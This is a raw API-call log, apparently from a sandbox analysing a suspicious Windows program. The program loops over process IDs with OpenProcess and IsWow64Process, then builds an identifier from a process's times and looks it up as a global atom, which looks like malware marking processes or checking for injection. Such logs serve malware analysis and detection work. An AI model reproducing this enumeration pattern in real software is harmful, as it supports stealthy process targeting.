	[0092.692] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.692] CloseHandle (hObject=0x20c) returned 1
	[0092.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.692] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.692] CloseHandle (hObject=0x20c) returned 1
	[0092.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.692] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.692] CloseHandle (hObject=0x20c) returned 1
	[0092.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.693] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.693] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.693] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.693] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.693] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.693] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.693] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.694] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.694] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.694] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.694] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.694] CloseHandle (hObject=0x20c) returned 1
	[0092.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.694] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.694] CloseHandle (hObject=0x20c) returned 1
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.780] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.780] CloseHandle (hObject=0x20c) returned 1
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.780] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.780] CloseHandle (hObject=0x20c) returned 1
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.780] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.781] CloseHandle (hObject=0x20c) returned 1
	[0092.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.781] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.781] CloseHandle (hObject=0x20c) returned 1
	[0092.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.781] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.781] CloseHandle (hObject=0x20c) returned 1
	[0092.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.781] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.781] CloseHandle (hObject=0x20c) returned 1
	[0092.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.781] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.781] CloseHandle (hObject=0x20c) returned 1
	[0092.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.781] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.781] CloseHandle (hObject=0x20c) returned 1
	[0092.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.782] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.782] CloseHandle (hObject=0x20c) returned 1
	[0092.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.782] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.782] CloseHandle (hObject=0x20c) returned 1
	[0092.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.782] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.782] CloseHandle (hObject=0x20c) returned 1
	[0092.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.783] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.783] CloseHandle (hObject=0x20c) returned 1
	[0092.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.783] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.783] CloseHandle (hObject=0x20c) returned 1
	[0092.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.783] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.783] CloseHandle (hObject=0x20c) returned 1
	[0092.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.783] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.783] CloseHandle (hObject=0x20c) returned 1
	[0092.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.783] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.783] CloseHandle (hObject=0x20c) returned 1
	[0092.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.784] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.784] CloseHandle (hObject=0x20c) returned 1
	[0092.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.784] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.784] CloseHandle (hObject=0x20c) returned 1
	[0092.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.784] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.784] CloseHandle (hObject=0x20c) returned 1
	[0092.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.784] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.784] CloseHandle (hObject=0x20c) returned 1
	[0092.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.784] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.784] CloseHandle (hObject=0x20c) returned 1
	[0092.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.785] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.785] CloseHandle (hObject=0x20c) returned 1
	[0092.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.785] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.785] CloseHandle (hObject=0x20c) returned 1
	[0092.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.785] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.785] CloseHandle (hObject=0x20c) returned 1
	[0092.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.785] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.785] CloseHandle (hObject=0x20c) returned 1
	[0092.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.785] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.786] CloseHandle (hObject=0x20c) returned 1
	[0092.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.786] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.786] CloseHandle (hObject=0x20c) returned 1
	[0092.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.786] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.786] CloseHandle (hObject=0x20c) returned 1
	[0092.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.786] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.786] CloseHandle (hObject=0x20c) returned 1
	[0092.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.786] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.786] CloseHandle (hObject=0x20c) returned 1
	[0092.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.786] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.787] CloseHandle (hObject=0x20c) returned 1
	[0092.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.787] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.787] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.787] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.788] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.788] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.788] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.788] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.788] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.788] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.789] CloseHandle (hObject=0x20c) returned 1
	[0092.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.789] CloseHandle (hObject=0x20c) returned 1
	[0092.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.861] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.861] CloseHandle (hObject=0x20c) returned 1
	[0092.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.861] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.861] CloseHandle (hObject=0x20c) returned 1
	[0092.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.861] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.861] CloseHandle (hObject=0x20c) returned 1
	[0092.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.861] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.862] CloseHandle (hObject=0x20c) returned 1
	[0092.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.862] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.862] CloseHandle (hObject=0x20c) returned 1
	[0092.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.862] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.862] CloseHandle (hObject=0x20c) returned 1
	[0092.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.862] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.862] CloseHandle (hObject=0x20c) returned 1
	[0092.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.862] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.862] CloseHandle (hObject=0x20c) returned 1
	[0092.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.863] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.863] CloseHandle (hObject=0x20c) returned 1
	[0092.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.863] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.863] CloseHandle (hObject=0x20c) returned 1
	[0092.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.863] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.863] CloseHandle (hObject=0x20c) returned 1
	[0092.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.863] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.863] CloseHandle (hObject=0x20c) returned 1
	[0092.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.863] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.863] CloseHandle (hObject=0x20c) returned 1
	[0092.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.863] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.864] CloseHandle (hObject=0x20c) returned 1
	[0092.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.864] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.864] CloseHandle (hObject=0x20c) returned 1
	[0092.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.864] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.864] CloseHandle (hObject=0x20c) returned 1
	[0092.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.864] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.864] CloseHandle (hObject=0x20c) returned 1
	[0092.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.864] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.864] CloseHandle (hObject=0x20c) returned 1
	[0092.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.864] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.864] CloseHandle (hObject=0x20c) returned 1
	[0092.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.865] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.865] CloseHandle (hObject=0x20c) returned 1
	[0092.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.865] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.865] CloseHandle (hObject=0x20c) returned 1
	[0092.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.865] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.865] CloseHandle (hObject=0x20c) returned 1
	[0092.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.865] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.865] CloseHandle (hObject=0x20c) returned 1
	[0092.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.865] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.865] CloseHandle (hObject=0x20c) returned 1
	[0092.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.865] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.866] CloseHandle (hObject=0x20c) returned 1
	[0092.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.866] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.866] CloseHandle (hObject=0x20c) returned 1
	[0092.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.866] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.866] CloseHandle (hObject=0x20c) returned 1
	[0092.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.866] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.866] CloseHandle (hObject=0x20c) returned 1
	[0092.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.866] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.866] CloseHandle (hObject=0x20c) returned 1
	[0092.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.866] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.866] CloseHandle (hObject=0x20c) returned 1
	[0092.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.867] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.867] CloseHandle (hObject=0x20c) returned 1
	[0092.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.867] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.867] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.867] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.868] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.868] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.868] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.868] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
